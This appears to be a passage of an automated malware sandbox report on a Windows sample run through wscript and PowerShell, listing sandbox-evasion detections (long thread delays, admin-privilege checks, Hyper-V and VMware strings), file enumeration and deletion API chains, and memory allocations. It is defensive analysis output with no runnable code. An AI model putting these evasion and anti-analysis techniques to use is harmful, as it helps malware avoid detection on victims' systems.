Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain checking for user administrative privileges

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Check user administrative privileges: IsUserAndAdmin, DecisionNode

graph_11-70934

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 8A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 2370000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 4370000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 4A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 5A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 5B70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory allocated: 6B70000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\recover.exe

Code function: 13_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,

13_2_0040BAE3

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

11_2_0041A941

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3902	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2659	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Window / User API: threadDelayed 533	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Window / User API: threadDelayed 9438	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_11-69187

Source: C:\Windows\SysWOW64\recover.exe

API coverage: 9.7 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7448	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7436	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe TID: 7512	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe TID: 7480	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe TID: 7580	Thread sleep count: 533 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe TID: 7580	Thread sleep time: -1599000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe TID: 7580	Thread sleep count: 9438 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe TID: 7580	Thread sleep time: -28314000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	11_2_004090DC
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	11_2_0040B6B5
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	11_2_0041C7E5
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	11_2_0040B8BA
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0044E989 FindFirstFileExA,	11_2_0044E989
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	11_2_00408CDE
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW,	11_2_00419CEE
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	11_2_00407EDD
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_00406F13 FindFirstFileW,FindNextFileW,	11_2_00406F13
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_040B10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	11_2_040B10F1
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_040B6580 FindFirstFileExA,	11_2_040B6580
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_10005B50 FindFirstFileW,FindNextFileW,FindNextFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	11_2_10005B50
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_10007E40 Sleep,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	11_2_10007E40
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_10019083 FindFirstFileExA,	11_2_10019083
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_10007510 FindFirstFileW,FindNextFileW,CreateFileW,FindNextFileW,FindClose,CloseHandle,FindClose,	11_2_10007510
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_0040B477 FindFirstFileW,FindNextFileW,	13_2_0040B477
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	14_2_00407EF8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	15_2_00407898

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

11_2_00407357

Source: C:\Windows\SysWOW64\recover.exe

Code function: 13_2_0041A8D8 memset,GetSystemInfo,

13_2_0041A8D8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: chrome.exe, 0000000C.00000002.1531447056.0000026A29A5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processorem32
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2520298639.0000000000BC0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW\|\|
Source: chrome.exe, 0000000C.00000003.1520101578.0000026A26444000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528229613.0000026A26444000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sWDHyper-V Hypervisor Root Partitionng@'
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A299C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V VM Vid Partitionll
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A29A5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A29A5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Virtual Processor
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A299C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A29A5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V VM Vid Partition*
Source: chrome.exe, 0000000C.00000003.1490453554.0000026A2CCB8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1490783215.0000026A2CCB8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flus
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A299C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Virtual Machine Bus Pipes*h
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A29A5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Logical Processorllys
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A299C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2Hyper-V VM Vid PartitionvityM
Source: wscript.exe, 00000000.00000002.1451497783.0000014FC47C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1451497783.0000014FC4790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1425201325.0000014FC2702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1446887384.0000014FC2708000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1357563591.0000014FC26EF000.00000004.00000020.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2518531242.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2520298639.0000000000BC0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000007.00000002.1418679927.000001CD79761000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: bhv37EE.tmp.13.dr	Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A29A5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V uxjpnyppxypybiq Bus Pipes
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A29A5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AlDHyper-V Virtual Machine Bus Pipesles\
Source: powershell.exe, 00000007.00000002.1418679927.000001CD79761000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A299C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X2Hyper-V VM Vid Partitionmund5
Source: chrome.exe, 0000000C.00000003.1490117606.0000026A2CCC4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Ti
Source: chrome.exe, 0000000C.00000003.1489388898.0000026A2CCAB000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1489429088.0000026A2CCB1000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1489206830.0000026A2CCAB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Packets received on this session3310Packets sent on this session3312Bytes received on this session3314Bytes sent on this session3316Errors - Transmit errors on this session3318Errors - Receive errors on this session3320Duration - Duration of the session (Seconds)3344DNS64 Global3346AAAA queries - Successful3348AAAA queries - Failed3350IP6.ARPA queries - Matched3352Other queries - Successful3354Other queries - Failed3356AAAA - Synthesized records3322IPHTTPS Global3324In - Total bytes received3326Out - Total bytes sent3328Drops - Neighbor resolution timeouts3330Errors - Authentication Errors3332Out - Total bytes forwarded3334Errors - Transmit errors on the server3336Errors - Receive errors on the server3338In - Total packets received3340Out - Total packets sent3342Sessions - Total sessions3230Teredo Server3232In - Teredo Server Total Packets: Success + Error3234In - Teredo Server Success Packets: Total3236In - Teredo Server Success Packets: Bubbles3238In - Teredo Server Success Packets: Echo3240In - Teredo Server Success Packets: RS-Primary3242In - Teredo Server Success Packets: RS-Secondary3244In - Teredo Server Error Packets: Total3246In - Teredo Server Error Packets: Header Error3248In - Teredo Server Error Packets: Source Error3250In - Teredo Server Error Packets: Destination Error3252In - Teredo Server Error Packets: Authentication Error3254Out - Teredo Server: RA-Primary3256Out - Teredo Server: RA-Secondary 3258In - Teredo Server Total Packets: Success + Error / sec3206Teredo Client3208In - Teredo Router Advertisement3210In - Teredo Bubble3212In - Teredo Data3214In - Teredo Invalid3216Out - Teredo Router Solicitation3218Out - Teredo Bubble3220Out - Teredo Data3222In - Teredo Data User Mode3224In - Teredo Data Kernel Mode3226Out - Teredo Data User Mode3228Out - Teredo Data Kernel Mode6468Hyper-V Dynamic Memory Integration Service6470Maximum Memory, Mbytes1848Bluetooth Radio1850Classic ACL bytes written/sec1852LE ACL bytes written/sec1854SCO bytes written/sec1856Classic ACL bytes read/sec1858LE ACL bytes read/sec1860SCO bytes read/sec1862Classic ACL Connections1864LE ACL Connections1866SCO Connections1868Sideband SCO Connections1870ACL flush events/sec1872LE ACL write credits1874Classic ACL write credits1876LE Scan Duty Cycle (%) - Uncoded 1M Phy1878LE Scan Window - Uncoded 1M Phy1880LE Scan Interval - Uncoded 1M Phy1882Page Scan Duty Cycle (%)1884Page Scan Window1886Page Scan Interval1888Inquiry Scan Duty Cycle (%)1890Inquiry Scan Window1892Inquiry Scan Interval1894LE Scan Duty Cycle (%) - Coded Phy1896LE Scan Window - Coded Phy1898LE Scan Interval - Coded Phy1900Bluetooth Device1902Classic ACL bytes written/sec1904LE ACL bytes written/sec1906SCO bytes written/sec1908Classic ACL bytes read/sec1910LE ACL bytes read/sec1912SCO bytes read/sec3814ServiceModelService 4.0.0.03816Calls3818Calls Per Second3820Calls Outstanding3822Calls Failed3824Calls Failed Per Second3826Calls Faulted3828Calls Faulted Per Second3830Calls Duration3832Security Validati
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A299C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipesf
Source: chrome.exe, 0000000C.00000003.1519655410.0000026A26463000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528229613.0000026A26463000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisorr;
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A29A10000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Partition
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000009.00000002.1398875263.000000000055F000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1520101578.0000026A26414000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528229613.0000026A26414000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1630652622.00000184F902B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A29A10000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus PipesljD
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A29A5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Servicem32
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A29A10000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor}y
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A29A5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Servicees\q
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A29A5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V uxjpnyppxypybiq Bus
Source: chrome.exe, 0000000C.00000003.1490783215.0000026A2CCB8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1489388898.0000026A2CCAB000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1490321570.0000026A2CCC1000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1489429088.0000026A2CCB1000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1489520753.0000026A2CCC1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler 